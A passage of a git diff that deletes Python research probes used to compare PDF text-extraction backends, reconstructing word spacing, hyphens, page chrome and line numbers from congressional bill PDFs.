type=int, default=None) - ap.add_argument("--only-declined", action="store_true", help="only the unnumbered layouts") - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - from deltatrack.compare.pdf import _is_unnumbered_layout - - docs = corpus_documents() - rows = [] - for i, (bill, version, pdf, _xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - # Decide membership BEFORE the expensive work: with --only-declined this skips the - # raw-text walk and the hybrid extraction on 42 of 52 documents. - prod_pages = PT.extract_clean_pages(pdf) - declined = _is_unnumbered_layout(prod_pages) - if args.only_declined and not declined: - continue - raws = raw_page_texts(pdf) - fired = {name: sum(len(pat.findall(r)) for r in raws) for name, pat in BRANCHES.items()} - hy_pages, _ = RH.reconstruct(pdfium_hybrid.extract(pdf)[0]) - entry = { - "doc": key, - "production_declined": declined, - "branch_fired": fired, - "diff": classify(PT.pdf_full_text(prod_pages)[0], PT.pdf_full_text(hy_pages)[0]), - } - rows.append(entry) - d = entry["diff"] - print( - f" [{len(rows)}] {key:<22} midline_branch_fired={fired['midline_hyphen_lowercase']:<5} " - f"trailing-hyphen prod/hyb={d['trailing_hyphen_production']}/{d['trailing_hyphen_hybrid']} " - f"soft-hyphen chars prod/hyb={d['soft_hyphen_chars_production']}/{d['soft_hyphen_chars_hybrid']} " - f"hyphenated-only-in-hybrid={d['hyphenated_only_in_hybrid']}", - file=sys.stderr, - ) - for s in d["samples_only_in_hybrid"][:4]: - print(f" only in hybrid: {s!r}", file=sys.stderr) - for s in d["samples_only_in_production"][:4]: - print(f" only in production: {s!r}", file=sys.stderr) - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps({"documents": rows}, indent=1)) - if args.limit_docs and len(rows) >= args.limit_docs: - break - - tot_fired = Counter() - for r in rows: - tot_fired.update(r["branch_fired"]) - print("\nbranch firings over the documents scored:") - for k, v in tot_fired.items(): - print(f" {k:28} {v:,}") - print( - f"\n trailing-hyphen tokens production={sum(r['diff']['trailing_hyphen_production'] for r in rows)}" - f" hybrid={sum(r['diff']['trailing_hyphen_hybrid'] for r in rows)}" - ) - print( - f" soft-hyphen chars in text production={sum(r['diff']['soft_hyphen_chars_production'] for r in rows)}" - f" hybrid={sum(r['diff']['soft_hyphen_chars_hybrid'] for r in rows)}" - ) - print(f" hyphenated tokens only in hybrid: {sum(r['diff']['hyphenated_only_in_hybrid'] for r in rows)}") - print(f" hyphenated tokens only in production: {sum(r['diff']['hyphenated_only_in_production'] for r in rows)}") - if args.out: - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py b/docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py deleted file mode 100644 index 8a0a83c8..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py +++ /dev/null @@ -1,204 +0,0 @@ -"""Probe: can ANY x-gap threshold separate word boundaries from intra-word kerning? - -`_SPACE_FACTOR` is a single global constant: a space is inserted when -`x0(next) - x1(prev) > factor * size(next)`. That rule can only work if the ratio -distribution at real word boundaries sits entirely above the distribution inside words. - -PDFium's own text page already knows the answer for each boundary, because it emits a -space character there -- either read from the content stream or GENERATED from font -metrics. So PDFium's stream is used here as the LABEL, and the geometry as the FEATURE. -This is not circular: the question is not "is PDFium right", it is "is the geometry the -neutral layer sees sufficient to recover the same decision with one constant". - -Reported per document: - * the ratio distribution for word boundaries and for intra-word adjacencies - * the overlap region, and the best achievable error at any threshold - * what the shipped 0.25 costs - -Read-only. Imports nothing from `src/deltatrack`. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py \ - tests/corpus/114-hr-2029/4_reported-in-senate.pdf --pages 40 -""" - -from __future__ import annotations - -import argparse -import ctypes -import json -import math -import sys -from pathlib import Path - -import pypdfium2 as pdfium -import pypdfium2.raw as R - -SHIPPED_FACTOR = 0.25 -# Same baseline tolerance the neutral layer uses, so adjacency is judged on the same -# notion of "one printed line" the reconstruction works with. -BASELINE_TOL = 0.6 - - -def _chars(textpage, page_obj): - """Per-index (cp, generated, x0, x1, origin_y, size) for one page, stream order.""" - raw = textpage.raw - n = R.FPDFText_CountChars(raw) - out = [] - for i in range(max(n, 0)): - cp = R.FPDFText_GetUnicode(raw, i) - left, right, bottom, top = (ctypes.c_double() for _ in range(4)) - if not R.FPDFText_GetCharBox( - raw, i, ctypes.byref(left), ctypes.byref(right), ctypes.byref(bottom), ctypes.byref(top) - ): - continue - ox, oy = ctypes.c_double(), ctypes.c_double() - if not R.FPDFText_GetCharOrigin(raw, i, ctypes.byref(ox), ctypes.byref(oy)): - continue - mat = R.FS_MATRIX() - if not R.FPDFText_GetMatrix(raw, i, ctypes.byref(mat)): - continue - gen = R.FPDFText_IsGenerated(raw, i) == 1 - size = R.FPDFText_GetFontSize(raw, i) * math.sqrt(mat.a * mat.a + mat.b * mat.b) - out.append((cp, gen, left.value, right.value, oy.value, size)) - return out - - -def pairs_for_page(chars): - """Yield (ratio, is_word_boundary) for adjacent INK pairs on the same printed line. - - Ink = a character PDFium placed with real geometry and that is not whitespace. - A pair is a word boundary when the only things between the two ink characters are - space characters (of either kind); it is intra-word when they are directly adjacent. - Pairs separated by a line break are skipped -- the space rule never sees those. - """ - ink = [] # (index_in_chars, x0, x1, origin_y, size) - sep = {} # (a,b) ink-pair -> saw a space between them - prev = None - saw_space = False - for cp, _gen, x0, x1, oy, size in chars: - if cp in (10, 13): # line break: reset adjacency - prev, saw_space = None, False - continue - if cp == 32: - saw_space = True - continue - ink.append((x0, x1, oy, size)) - if prev is not None: - sep[len(ink) - 1] = saw_space - prev = len(ink) - 1 - saw_space = False - - for j in range(1, len(ink)): - if j not in sep: - continue - px0, px1, poy, _ps = ink[j - 1] - x0, _x1, oy, size = ink[j] - if abs(oy - poy) > BASELINE_TOL: # different printed lines - continue - if size <= 0: - continue - yield (x0 - px1) / size, sep[j] - - -def score(doc_pairs): - """Best achievable threshold and its error count, plus what 0.25 costs.""" - bnd = sorted(r for r, w in doc_pairs if w) - intra = sorted(r for r, w in doc_pairs if not w) - if not bnd or not intra: - return None - # A threshold t inserts a space when ratio > t. Errors = boundaries with ratio <= t - # (missed space) + intra-word with ratio > t (spurious space). Sweep every candidate. - cands = sorted({round(r, 6) for r in bnd + intra}) - best = None - for t in cands: - miss = sum(1 for r in bnd if r <= t) - spur = sum(1 for r in intra if r > t) - if best is None or miss + spur < best[1]: - best = (t, miss + spur, miss, spur) - miss25 = sum(1 for r in bnd if r <= SHIPPED_FACTOR) - spur25 = sum(1 for r in intra if r > SHIPPED_FACTOR) - return { - "word_boundaries": len(bnd), - "intra_word": len(intra), - "boundary_ratio_min": round(bnd[0], 4), - "boundary_ratio_p01": round(bnd[max(0, len(bnd) // 100)], 4), - "boundary_ratio_median": round(bnd[len(bnd) // 2], 4), - "intra_ratio_median": round(intra[len(intra) // 2], 4), - "intra_ratio_p99": round(intra[min(len(intra) - 1, len(intra) * 99 // 100)], 4), - "intra_ratio_max": round(intra[-1], 4), - "separable": bnd[0] > intra[-1], - "overlap_boundaries_below_intra_max": sum(1 for r in bnd if r <= intra[-1]), - "best_threshold": round(best[0], 4), - "best_threshold_errors": best[1], - "best_threshold_missed_spaces": best[2], - "best_threshold_spurious_spaces": best[3], - "shipped_0.25_missed_spaces": miss25, - "shipped_0.25_spurious_spaces": spur25, - } - - -def main() -> int: - ap = argparse.ArgumentParser() - ap.add_argument("pdfs", nargs="+") - ap.add_argument("--pages", type=int, default=None, help="limit pages per document") - ap.add_argument("--json-out", type=Path) - args = ap.parse_args() - - results = {} - pooled: list[tuple[float, bool]] = [] - for path in args.pdfs: - doc = pdfium.PdfDocument(path) - pairs: list[tuple[float, bool]] = [] - try: - n = len(doc) if args.pages is None else min(args.pages, len(doc)) - for p in range(n): - pg = doc[p] - tp = pg.get_textpage() - try: - pairs.extend(pairs_for_page(_chars(tp, pg))) - finally: - tp.close() - pg.close() - finally: - doc.close() - s = score(pairs) - results[path] = s - pooled.extend(pairs) - if s: - print(f"\n## {path} (pages={n})") - print(f" word boundaries={s['word_boundaries']} intra-word={s['intra_word']}") - print( - f" boundary gap/size: min={s['boundary_ratio_min']} " - f"p01={s['boundary_ratio_p01']} median={s['boundary_ratio_median']}" - ) - print( - f" intra-word gap/size: median={s['intra_ratio_median']} " - f"p99={s['intra_ratio_p99']} max={s['intra_ratio_max']}" - ) - print(f" linearly separable by ONE threshold: {s['separable']}") - print( - f" best possible threshold {s['best_threshold']} still errs on " - f"{s['best_threshold_errors']} pairs " - f"({s['best_threshold_missed_spaces']} missed, {s['best_threshold_spurious_spaces']} spurious)" - ) - print( - f" shipped 0.25 errs on {s['shipped_0.25_missed_spaces']} missed + " - f"{s['shipped_0.25_spurious_spaces']} spurious" - ) - - if len(args.pdfs) > 1: - s = score(pooled) - results["__pooled__"] = s - print(f"\n## POOLED over {len(args.pdfs)} documents") - print(json.dumps(s, indent=1)) - - if args.json_out: - args.json_out.parent.mkdir(parents=True, exist_ok=True) - args.json_out.write_text(json.dumps(results, indent=1)) - print(f"\nwrote {args.json_out}") - return 0 - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/docs/research/pdf-backend-bakeoff/probes/reconstruct.py b/docs/research/pdf-backend-bakeoff/probes/reconstruct.py deleted file mode 100644 index 4f5b62da..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/reconstruct.py +++ /dev/null @@ -1,304 +0,0 @@ -"""Neutral reconstruction: `PdfPage` glyph facts -> the `Page`/`Line` structures DeltaTrack consumes. - -This is the layer the spec calls for in "the seam must be glyph facts, not PDFium-shaped -text". Every backend is graded through this one implementation, so no backend can win by -imitating the incumbent's text-API conventions. - -WHAT THIS LAYER DOES NOT NEED, and why that matters ---------------------------------------------------- -`parsers/pdf_text.normalize_raw` has no counterpart here, and that is the point. Every -transformation it performs exists to undo damage PDFium's *text API* does: - - * the U+FFFE soft-hyphen glyph with the next margin number glued inline - * footer chrome dragged onto a line by a page-boundary hyphen - * trailing spaces PDFium keeps on nearly every line - * a scrambled reading order that floats running headers to the top of the page - -None of those exist in the glyph stream. At glyph level GPO renders an ordinary -hyphen-minus at a syllable break, chrome sits where it is printed, and reading order is -whatever we choose -- here, strictly top-to-bottom by baseline. So the neutral path is -SHORTER than the incumbent's, not longer, and it is a genuine finding of this spike that -~40% of `pdf_text.py`'s regex surface is backend-repair rather than domain logic. - -WHAT IT REUSES --------------- -`_merge_print_lines`, `_parse_print_lines` and `rejoin_soft_hyphens` are imported from -production unchanged: they operate on already-assembled lines and carry no PDFium -assumption. `_line_text` and `_first_word_right` are reimplemented here only because the -production versions take a fixed 5-tuple; the logic (gap-based spacing, space-glyph word -boundary) is identical and is exercised against the incumbent by the calibration gate. - -`_cluster_baselines` is deliberately NOT reused. It clusters on the char-box bottom with -a tolerance of 0.5x the page-median glyph size, which is correct for its own purpose (a -margin-number -> geometry sidecar, where a descender-only fragment simply fails the -line-number match and is dropped) but wrong for text reconstruction: on a 14pt body line -the descender drop is ~8.4pt against a 7pt tolerance, so `heading` splits into `headin` -plus a stray `g`. The contract carries the text-matrix origin instead, which every -candidate backend exposes and which is exact. -""" - -from __future__ import annotations - -import re -import statistics -import sys -from pathlib import Path - -# Locate the engine relative to this file when running from the checkout. Under Pyodide -# the probes live in a flat VFS with no repo above them and `deltatrack` is already on -# sys.path, so the derivation is guarded rather than assumed -- an unguarded parents[3] -# raises IndexError there and takes every browser backend down with it. -_here = Path(__file__).resolve() -if len(_here.parents) > 3: - _src = _here.parents[3] / "src" - if _src.is_dir() and str(_src) not in sys.path: - sys.path.insert(0, str(_src)) - -from contract import BASELINE, CP, SIZE, UPRIGHT, X0, X1, PdfPage # noqa: E402 - -from deltatrack.parsers.pdf_text import ( # noqa: E402 - Line, - LineGeom, - Page, - _merge_print_lines, - rejoin_soft_hyphens, -) - -_NUMBERED_LINE = re.compile(r"^(\d{1,2}) (.*)$") -_SIZE_FLOOR = 1.0 # points; drop degenerate/zero-scale glyphs (clip/invisible) -_SPACE_FACTOR = 0.25 # x-gap > factor x glyph size => insert a word space -_BASELINE_TOL = 0.6 # points; baselines within this are the same printed line - -# Page chrome, matched against a RECONSTRUCTED VISUAL LINE (not a scrambled text blob), -# so each pattern anchors the whole line rather than hunting inside a page-wide string. -_CHROME_PATTERNS = ( - re.compile(r"^\d{1,4}$"), # page-number header - re.compile(r"^•\s*(?:HR|S|H|HRES|SRES|HJRES|SJRES|HCONRES|SCONRES)\b.*$"), - re.compile(r"^(?:H|S|HR|HRES|SRES|HJRES|SJRES|HCONRES|SCONRES)\s+\d+\s+[A-Z]{2,4}$"), - re.compile(r"^VerDate\b"), - re.compile(r"\bon DSK\S*\s*(?:PROD|with)\b"), - re.compile(r"^\S+ on DSK"), -) -# The rotated left-gutter watermark is set in a small face and breaks into 2-4 glyph -# fragments ('ORP', 'N32', 'Dn'). It is caught by size, not by pattern: no printed body -# line on a GPO bill page is set below this fraction of the page's dominant body size. -_CHROME_SIZE_RATIO = 0.55 - - -def _line_text(cluster: list) -> str: - """Reconstruct a visual line's text, inserting a space where the x-gap to the next - glyph exceeds SPACE_FACTOR x its size. - - Backend-neutral in both directions: PDFium emits real space glyphs and needs the gap - rule only between the margin number and the body, while PDF.js loses inter-word - spaces at font boundaries (`Providedfurther,That`) and needs the gap rule everywhere. - One rule serves both, which is why the seam is geometry rather than text. - """ - items = sorted(cluster, key=lambda g: g[X0]) - out: list[str] = [] - prev_right: float | None = None - for g in items: - if prev_right is not None and g[X0] - prev_right > _SPACE_FACTOR * g[SIZE]: - out.append(" ") - out.append(chr(g[CP])) - prev_right = g[X1] - return re.sub(r" +", " ", "".join(out)).strip() - - -def _first_word_right(content_glyphs: list) -> float | None: - """Right x-edge of the first word in a line's content glyphs, or None if empty. - - Same two-test rule as production: a real space glyph ends the first word, and a wide - x-gap is the fallback for backends that emit no space glyph. - """ - first_word_right: float | None = None - prev_right: float | None = None - for g in content_glyphs: - if g[CP] == 32: - if first_word_right is None: - continue - break - if prev_right is not None and g[X0] - prev_right > _SPACE_FACTOR * g[SIZE]: - break - first_word_right = g[X1] - prev_right = g[X1] - return first_word_right - - -def cluster_lines(page: PdfPage) -> list[list]: - """Group a page's glyphs into printed lines by baseline, top of page first. - - Tolerance is a small absolute value rather than a fraction of glyph size: the - contract's baseline is the text-matrix origin, which is exact and shared across a - printed line regardless of the glyph sizes on it, so no size-derived slack is needed. - A fractional tolerance would merge a small chrome line into an adjacent body line on - pages where the two sit close together. - """ - # Rotated glyphs are excluded outright. GPO sets a vertical watermark down the left - # gutter; for rotated text the matrix origin is not a horizontal baseline, so those - # glyphs land on arbitrary y values and collide with body lines (measured: a stray - # rotated glyph destroyed the margin-number match on printed lines 24 and 25). They - # are page chrome in every case, so dropping them loses nothing. - kept = [g for g in page.glyphs if g[SIZE] > _SIZE_FLOOR and g[UPRIGHT]] - if not kept: - return [] - rows: list[list] = [] - current: list = [] - anchor: float | None = None - for g in sorted(kept, key=lambda g: -g[BASELINE]): - if anchor is None or abs(g[BASELINE] - anchor) <= _BASELINE_TOL: - current.append(g) - if anchor is None: - anchor = g[BASELINE] - else: - rows.append(current) - current = [g] - anchor = g[BASELINE] - if current: - rows.append(current) - return rows - - -def _dominant_size(rows: list[list]) -> float: - """The page's dominant printed-body glyph size, used as the chrome size threshold.""" - sizes = [g[SIZE] for row in rows for g in row] - if not sizes: - return 0.0 - try: - return statistics.mode([round(s, 1) for s in sizes]) - except statistics.StatisticsError: - return statistics.median(sizes) - - -def is_chrome(text: str, row: list, body_size: float) -> bool: - if not text: - return True - for pat in _CHROME_PATTERNS: - if pat.search(text): - return True - row_size = statistics.median([g[SIZE] for g in row]) - return bool(body_size) and row_size < _CHROME_SIZE_RATIO * body_size - - -def _repair_line_end(text: str) -> tuple[str, bool]: - """Rewrite a trailing unnamed glyph (U+FFFD) as a hyphen. - - THE POSITION RULE, and why it is neutral. A backend that cannot name a glyph still - reports that there is ink there. When that ink is the LAST thing on a printed line, - the only thing GPO sets in that position is a syllable-break hyphen, so the identity - is recoverable from position alone. The rule never inspects a backend-specific - codepoint (PDFium's 0x02, pdfminer's "(cid:N)"), only "unnamed ink, line-final", so - it is available to every backend equally and is a no-op for the four that already - resolve the character. - - It is applied in `repaired` mode ONLY. Scoring runs both ways and reports the gap, - because the size of that gap IS the measurement of a backend's glyph-naming deficit, - and folding the repair in by default would hide exactly the difference the bake-off - exists to find. - """ - if text.endswith("�"): - return text[:-1] + "-", True - return text, False - - -def reconstruct_page(page: PdfPage, repaired: bool = False) -> tuple[Page, dict]: - """Turn one `PdfPage` of glyph facts into a DeltaTrack `Page`. - - Returns the page plus a per-page diagnostic dict the scorer aggregates (visual lines - seen, dropped as chrome, carrying a margin number, and repaired line ends). - """ - rows = cluster_lines(page) - body_size = _dominant_size(rows) - - print_lines: list[Line] = [] - line_sizes: dict[int, tuple[float, LineGeom]] = {} - ambiguous: set[int] = set() - n_chrome = 0 - n_numbered = 0 - n_repaired = 0 - n_unnamed = 0 - - for row in rows: - ordered = sorted(row, key=lambda g: g[X0]) - text = _line_text(ordered) - if is_chrome(text, ordered, body_size): - n_chrome += 1 - continue - - n_unnamed += text.count("�") - if repaired: - text, did = _repair_line_end(text) - n_repaired += did - - m = _NUMBERED_LINE.match(text) - if not m: - print_lines.append(Line(None, text)) - continue - - n_numbered += 1 - line_number = int(m.group(1)) - content = m.group(2) - print_lines.append(Line(line_number, content)) - - # Geometry sidecar, keyed by margin line number exactly as production does, so a - # duplicate number within a page is dropped as ambiguous rather than overwritten. - n_margin = len(m.group(1)) - content_glyphs = ordered[n_margin:] - printed = [g for g in content_glyphs if g[CP] != 32] - if not printed: - continue - sizes = [g[SIZE] for g in printed] - fwr = _first_word_right(content_glyphs) - if fwr is None: - continue - geom = LineGeom(printed[0][X0], max(g[X1] for g in printed), fwr) - if line_number in line_sizes or line_number in ambiguous: - ambiguous.add(line_number) - line_sizes.pop(line_number, None) - continue - line_sizes[line_number] = (round(statistics.median(sizes), 1), geom) - - merged, ranges = _merge_print_lines(print_lines) - merged = [ - ln - if ln.line_number is None or ln.line_number not in line_sizes - else Line( - ln.line_number, - ln.text, - line_sizes[ln.line_number][0], - line_sizes[ln.line_number][1], - ) - for ln in merged - ] - diag = { - "visual_lines": len(rows), - "chrome_lines": n_chrome, - "numbered_lines": n_numbered, - "ambiguous_numbers": len(ambiguous), - "unnamed_glyphs": n_unnamed, - "repaired_line_ends": n_repaired, - } - return Page(page.page_number, tuple(merged), tuple(print_lines), tuple(ranges)), diag - - -def reconstruct(pages: list[PdfPage], repaired: bool = False) -> tuple[list[Page], dict]: - out: list[Page] = [] - agg = { - "visual_lines": 0, - "chrome_lines": 0, - "numbered_lines": 0, - "ambiguous_numbers": 0, - "unnamed_glyphs": 0, - "repaired_line_ends": 0, - } - for p in pages: - page, diag = reconstruct_page(p, repaired=repaired) - out.append(page) - for k, v in diag.items(): - agg[k] += v - return out, agg - - -def full_text(pages: list[Page]) -> str: - """Whole-document text with cross-page soft hyphens rejoined, for text scoring.""" - return rejoin_soft_hyphens("\n".join(p.text for p in pages)) diff --git a/docs/research/pdf-backend-bakeoff/probes/reconstruct_hybrid.py b/docs/research/pdf-backend-bakeoff/probes/reconstruct_hybrid.py deleted file mode 100644 index 6294c918..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/reconstruct_hybrid.py +++ /dev/null @@ -1,276 +0,0 @@ -"""Hybrid reconstruction: engine-ordered characters + geometry -> DeltaTrack `Page`. - -Deliberately a minimal edit of `reconstruct.py`, so that a difference in results is -attributable to the one thing that changed. Identical here: the margin-number regex, the -chrome patterns, the chrome size ratio, the baseline tolerance, the geometry sidecar, the -merge, and the reuse of production's `_merge_print_lines` / `rejoin_soft_hyphens`. - -THE ONE THING THAT CHANGED, and the whole hypothesis: - - reconstruct.py sorts a line's glyphs by x and RE-DERIVES the word spaces from - x-gaps, using one global constant (`_SPACE_FACTOR`). - this module takes the line's characters in the engine's own order and uses the - word spaces the engine already decided, including the ones it - SYNTHESISED rather than read from the page. - -Line assignment stays geometric (cluster on baseline), not stream-order, and that split -is the point of the design rather than a compromise. The two failure modes are different -and they live at different scales: - - * BETWEEN lines, PDFium's reading order is unreliable on GPO pages -- it floats the - running header to the top of the page. Geometry fixes that, and `pdf_text.py`'s - `strip_page_chrome` exists because the string pipeline cannot. - * WITHIN a line, geometry is not sufficient -- see `probe_space_separability.py`: the - gap/size ratio at real word boundaries overlaps the ratio inside words, so no single - threshold separates them. The engine's decision is. - -So each layer is used where it is actually the better source, rather than one being -declared authoritative for everything. - -WHAT THIS LAYER DOES NOT NEED, and why that is a finding --------------------------------------------------------- -Against `reconstruct.py` it drops the x-gap word-space rule and the "unnamed ink, -line-final" hyphen heuristic. Against `parsers/pdf_text.py` it additionally drops -`normalize_raw` in full: the U+FFFE-plus-glued-margin-number rewrite, the glued-chrome -rewrite, the mid-line hyphen join and the trailing-space strip are all repairs of damage -that only exists in a page-wide text BLOB, and none of it exists once the characters are -addressed by index with their geometry attached. -""" - -from __future__ import annotations - -import re -import statistics -import sys -from pathlib import Path - -_here = Path(__file__).resolve() -if len(_here.parents) > 3: - _src = _here.parents[3] / "src" - if _src.is_dir() and str(_src) not in sys.path: - sys.path.insert(0, str(_src)) - -from contract_hybrid import BASELINE, CP, FONT, GEN, SIZE, UPRIGHT, X0, X1, HybridPage # noqa: E402 - -from deltatrack.parsers.pdf_text import ( # noqa: E402 - Line, - LineGeom, - Page, - _merge_print_lines, - rejoin_soft_hyphens, -) - -_NUMBERED_LINE = re.compile(r"^(\d{1,2}) (.*)$") -_SIZE_FLOOR = 1.0 -_BASELINE_TOL = 0.6 -_SOFT_HYPHEN = "­" - -# Byte-for-byte the patterns in reconstruct.py. Chrome identification is GPO knowledge, -# not PDF-layout knowledge, so it is exactly the part that should NOT move to the engine. -_CHROME_PATTERNS = ( - re.compile(r"^\d{1,4}$"), - re.compile(r"^•\s*(?:HR|S|H|HRES|SRES|HJRES|SJRES|HCONRES|SCONRES)\b.*$"), - re.compile(r"^(?:H|S|HR|HRES|SRES|HJRES|SJRES|HCONRES|SCONRES)\s+\d+\s+[A-Z]{2,4}$"), - re.compile(r"^VerDate\b"), - re.compile(r"\bon DSK\S*\s*(?:PROD|with)\b"), - re.compile(r"^\S+ on DSK"), -) -_CHROME_SIZE_RATIO = 0.55 - - -def cluster_lines(page: HybridPage) -> list[list]: - """Group a page's characters into printed lines by baseline, top of page first. - - Order WITHIN each returned line is the engine's char order, preserved. Only the - assignment of a character to a line is geometric. - - Generated characters are kept: their baseline is real (measured -- it is the one - geometric fact `FPDFText_GetCharOrigin` supplies for them) and they carry the word - spacing this layer exists to use. They are exempt from the size floor and the upright - test, both of which read fields a generated char does not have. - """ - kept = [ - (i, c) - for i, c in enumerate(page.chars) - if c[BASELINE] is not None and (c[GEN] or (c[SIZE] is not None and c[SIZE] > _SIZE_FLOOR and c[UPRIGHT])) - ] - if not kept: - return [] - rows: list[list] = [] - current: list = [] - anchor: float | None = None - # Descending baseline puts the top of the page first. Sorting by baseline is ONLY a - # way to decide which line a character belongs to; it must not be allowed to decide - # the order WITHIN a line, because origins on one printed line differ by float noise. - # Measured: a heading's full-size initial letter reports a baseline 0.003 pt above the - # small caps that follow it, which is enough for a baseline sort to hoist it to the - # front of the line and render `MILITARY` as `M6 ILITARY`. Each row is therefore - # restored to engine order before it is read. - for item in sorted(kept, key=lambda t: (-t[1][BASELINE], t[0])): - c = item[1] - if anchor is None or abs(c[BASELINE] - anchor) <= _BASELINE_TOL: - current.append(item) - if anchor is None: - anchor = c[BASELINE] - else: - rows.append(current) - current = [item] - anchor = c[BASELINE] - if current: - rows.append(current) - return [[c for _i, c in sorted(row, key=lambda t: t[0])] for row in rows] - - -def _line_text(row: list) -> str: - """Join a printed line's characters in engine order. No spacing rule is applied. - - Line-break characters PDFium generates at the end of a row are dropped; the row IS - the line. A soft hyphen is rendered as an ASCII hyphen so production's - `_merge_print_lines` and `rejoin_soft_hyphens` see the boundary they already know. - """ - out = [] - for c in row: - ch = chr(c[CP]) - if ch in ("\r", "\n"): - continue - out.append("-" if ch == _SOFT_HYPHEN else ch) - return re.sub(r" +", " ", "".join(out)).strip() - - -def _dominant_size(rows: list[list]) -> float: - sizes = [c[SIZE] for row in rows for c in row if c[SIZE] is not None] - if not sizes: - return 0.0 - try: - return statistics.mode([round(s, 1) for s in sizes]) - except statistics.StatisticsError: - return statistics.median(sizes) - - -def is_chrome(text: str, row: list, body_size: float) -> bool: - if not text: - return True - for pat in _CHROME_PATTERNS: - if pat.search(text): - return True - sizes = [c[SIZE] for c in row if c[SIZE] is not None] - if not sizes: - return True - return bool(body_size) and statistics.median(sizes) < _CHROME_SIZE_RATIO * body_size - - -def _first_word_right(content: list) -> float | None: - """Right x-edge of the first word among a line's content characters. - - Simpler than either predecessor, and for a reason worth recording: a word boundary - here is just "a space character", with no x-gap fallback, because the engine emits a - space at every boundary -- generated where the content stream has none. The fallback - the other two implementations need exists only to cover boundaries the engine already - marked. - """ - first_right: float | None = None - for c in content: - if c[CP] == 32: - if first_right is None: - continue - break - if c[X1] is not None: - first_right = c[X1] - return first_right - - -def reconstruct_page(page: HybridPage) -> tuple[Page, dict]: - rows = cluster_lines(page) - body_size = _dominant_size(rows) - - print_lines: list[Line] = [] - line_sizes: dict[int, tuple[float, LineGeom]] = {} - ambiguous: set[int] = set() - n_chrome = n_numbered = n_unnamed = 0 - n_out_of_order = 0 - - for row in rows: - # Diagnostic only, never a correction: how often engine order disagrees with - # left-to-right x order on a printed line. If this were large the design would be - # unsound, so it is counted rather than assumed away. - xs = [c[X0] for c in row if c[X0] is not None] - if any(b < a for a, b in zip(xs, xs[1:])): - n_out_of_order += 1 - - text = _line_text(row) - if is_chrome(text, row, body_size): - n_chrome += 1 - continue - n_unnamed += text.count("�") - - m = _NUMBERED_LINE.match(text) - if not m: - print_lines.append(Line(None, text)) - continue - - n_numbered += 1 - line_number = int(m.group(1)) - print_lines.append(Line(line_number, m.group(2))) - - # Geometry sidecar, keyed by margin line number exactly as production does. - # The margin number is skipped by counting its characters in the same stream the - # text was read from, so the two cannot drift apart. - ink = [c for c in row if chr(c[CP]) not in ("\r", "\n")] - content = ink[len(m.group(1)) :] - printed = [c for c in content if c[CP] != 32 and c[X0] is not None] - if not printed: - continue - fwr = _first_word_right(content) - if fwr is None: - continue - geom = LineGeom(printed[0][X0], max(c[X1] for c in printed), fwr) - sizes = [c[SIZE] for c in printed if c[SIZE] is not None] - if not sizes: - continue - if line_number in line_sizes or line_number in ambiguous: - ambiguous.add(line_number) - line_sizes.pop(line_number, None) - continue - line_sizes[line_number] = (round(statistics.median(sizes), 1), geom) - - merged, ranges = _merge_print_lines(print_lines) - merged = [ - ln - if ln.line_number is None or ln.line_number not in line_sizes - else Line(ln.line_number, ln.text, line_sizes[ln.line_number][0], line_sizes[ln.line_number][1]) - for ln in merged - ] - diag = { - "visual_lines": len(rows), - "chrome_lines": n_chrome, - "numbered_lines": n_numbered, - "ambiguous_numbers": len(ambiguous), - "unnamed_glyphs": n_unnamed, - "out_of_order_lines": n_out_of_order, - } - return Page(page.page_number, tuple(merged), tuple(print_lines), tuple(ranges)), diag - - -def reconstruct(pages: list[HybridPage]) -> tuple[list[Page], dict]: - out: list[Page] = [] - agg = { - "visual_lines": 0, - "chrome_lines": 0, - "numbered_lines": 0, - "ambiguous_numbers": 0, - "unnamed_glyphs": 0, - "out_of_order_lines": 0, - } - for p in pages: - page, diag = reconstruct_page(p) - out.append(page) - for k, v in diag.items(): - agg[k] += v - return out, agg - - -def full_text(pages: list[Page]) -> str: - return rejoin_soft_hyphens("\n".join(p.text for p in pages)) - - -__all__ = ["cluster_lines", "full_text", "is_chrome", "reconstruct", "reconstruct_page", "FONT"] diff --git a/docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py b/docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py deleted file mode 100644 index aace0f29..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py +++ /dev/null @@ -1,182 +0,0 @@ -"""Red-team item 5: ablate every repair/normalization the neutral layer introduces. - -Each of these was added DURING the spike, several of them after seeing PDFium's output. -Any one could encode a PDFium-shaped assumption that flatters the incumbent and its WASM -twin. So each is removed in turn and the ranking recomputed. - -Ranking is recomputed on the two metrics that do NOT use PDFium as ground truth: - - text_f1 token F1 against the XML body (independent) - heading_f1 anchor labels against the XML tree's (independent) - heading-ish labels, LEVEL-AGNOSTIC because the two pipelines assign - different level names to the same objects -- comparing level-by-level - produces a spurious reversal, which this reviewer initially fell for. - -Breadcrumb agreement and T4 are deliberately NOT used here: both take PDFium as the -reference, so for PDFium-WASM they are close to tautological. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py -""" - -from __future__ import annotations - -import json -import statistics -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import reconstruct as R # noqa: E402 -from contract import ALL_BACKENDS, run_backend # noqa: E402 -from score_phase1 import align_to_body, normalize_for_text_compare, token_f1, xml_body_tokens # noqa: E402 - -from deltatrack.bill_tree import normalize_bill # noqa: E402 -from deltatrack.formatters.text_serializer import build_xml_full_text # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 - -# A spread of print classes rather than a convenience sample. -DOCS = [ - "118-hr-4366/1_reported-in-house", - "118-hr-4366/4_engrossed-amendment-senate", - "118-hr-2882/5_engrossed-amendment-house", - "115-hr-5895/1_reported-in-house", - 